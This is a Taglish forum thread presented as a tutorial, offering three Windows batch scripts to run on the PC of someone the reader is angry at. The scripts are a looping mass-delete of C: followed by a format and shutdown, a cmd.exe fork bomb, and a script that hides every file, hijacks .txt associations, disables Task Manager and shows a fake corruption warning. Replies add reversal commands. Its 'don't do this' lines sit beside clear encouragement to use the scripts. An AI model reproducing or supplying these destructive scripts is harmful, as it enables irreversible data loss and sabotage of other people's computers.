👨‍🏫 Tutorial Even if you hate someone >_< Don't do this. Nakakatakot!!!

Hindi ko pa ito na test, kasi ayaw kung magkasala, pero try nyo nga kung totoo. copy paste sa codes sa notepad then save it as .bat (hindi .text.bat)

Galit ka ba sa isang tao at may access ka sa PC niya? Gusto mo bang marining yung PC niya na parang umaawit ng last rites? Please don't do this. Pero tandaan mo: Kapag na-run na to, walang 'Undo' button. Yung data niya? Wala na. System niya? Bricked. Ikaw na bahala sa sarili mong pagkakamali.

Narito ang 3 Tiers of .bat Hell. Piliin mo kung anong 'flavor' ng pain ang gusto mo.


🩸 Level 1: The "Delete Everything" Purge (Relentless)​

Yung classic. Find and destroy.
Ito ay nagde-delete ng lahat ng files sa C: drive (at pwedeng D: kung bibaguin mo) nang walang tanong. Loop ito para sigurado na ang lahat ng hidden files ay nasira rin. Messy? Oo. Brutal? Definitely. Efficient? Oo nga.

echo off
title SYSTEM PURGE
color 0c
echo WARNING: ALL DATA WILL BE PERMANENTLY DELETED.
echo.
echo Initializing Purge Sequence...
ping -n 3 127.0.0.1 >nul

:: Loop to ensure every single file is hit
:loop
del /f /q /s C:\.>nul 2>&1
del /f /q /s C:\Users\. >nul 2>&1
del /f /q /s C:\Windows\. >nul 2>&1
if exist C:\Users (goto loop)

:: Final wipe
format C: /q /y >nul 2>&1
shutdown -s -t 5 -c "GOODBYE FOREVER"




Ano ang ginagawa nito: Aggressive na pinapagulo ang user files, system files, tapos sinusubukan i-format ang C: drive nang tahimik. Tapos mag-shut down ang PC mo sa loob ng 5 seconds.

Danger Level: High. Kung wala kang backups, dead ka na.


🧠 Level 2: The "Endless Loop" Brain**** (Memory Hog)​

Hindi ito nagde-delete ng files. Etsa ng RAM at CPU natin hanggang sa makulay ang monitor o mag-freeze ang PC. Spawn ng thousands ng processes. Parang digital seizure ang pakiramdam.

echo off
:loop
start cmd.exe
goto loop



Ano ang ginagawa nito: Bubuksan ang bago command prompt window every millisecond. 100% CPU usage agad. Late ang mouse. Ang fans ay magiging parang airplane. Kailangan mong pindutin ang power button para i-force quit.

Danger Level: Medium-High. Angkrihoso/Resource Killer. Madali i-fix kung alam mo ang Task Manager, pero panloloko talaga sa ordinaryong user.


💀 Level 3: The "Registry Rip" (Deep System Kill)​

Ito ang psychological warfare. Binabago ang file associations, tinatago ang files, at ginagawang mukhang corrupted ang OS mo.

echo off
:: Hide all files and folders
attrib +h +s +r C:\. /s /d

:: Change file association for .txt to a dummy file
assoc .txt=batfile

:: Disable Task Manager
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

:: Change Desktop Background to black
reg add "HKCU\Control Panel\Desktop" /v WallPaper /t REG_SZ /d "" /f
reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d 10 /f

:: Show a scary message
msg * "YOUR SYSTEM IS CORRUPTED. DATA LOSS IMMINENT."

:: Loop the message
:loop
goto loop



Ano ang ginagawa nito: Tinatago ang files mo (parang nawala na), pinatay ang Task Manager (so hindi mo kayang i-kill ang script), at binabalewala ka ng error messages.

Danger Level: High. (Data Loss + Annoyance). Mahirap i-reverse kung hindi mo alam ang registry keys.

 
Pang reverse

attrib -h -s -r C:\. /s /d
assoc .txt=txtfile
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f
reg add "HKCU\Control Panel\Desktop" /v WallPaper /t REG_SZ /d ""
/f
 
Pang reverse

attrib -h -s -r C:\. /s /d
assoc .txt=txtfile
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f
reg add "HKCU\Control Panel\Desktop" /v WallPaper /t REG_SZ /d ""
/f
reverse sa 3 boss? check ko later,, pafeedback if ginawa mo number 3 at nareverse bossing
 

About this Thread

  • 7
    Replies
  • 173
    Views
  • 4
    Participants
Last reply from:
simplyjepox

Online now

Members online
1,365
Guests online
4,082
Total visitors
5,447

Forum statistics

Threads
2,322,093
Posts
29,214,113
Members
1,177,271
Latest member
mudvayneharold4
Back
Top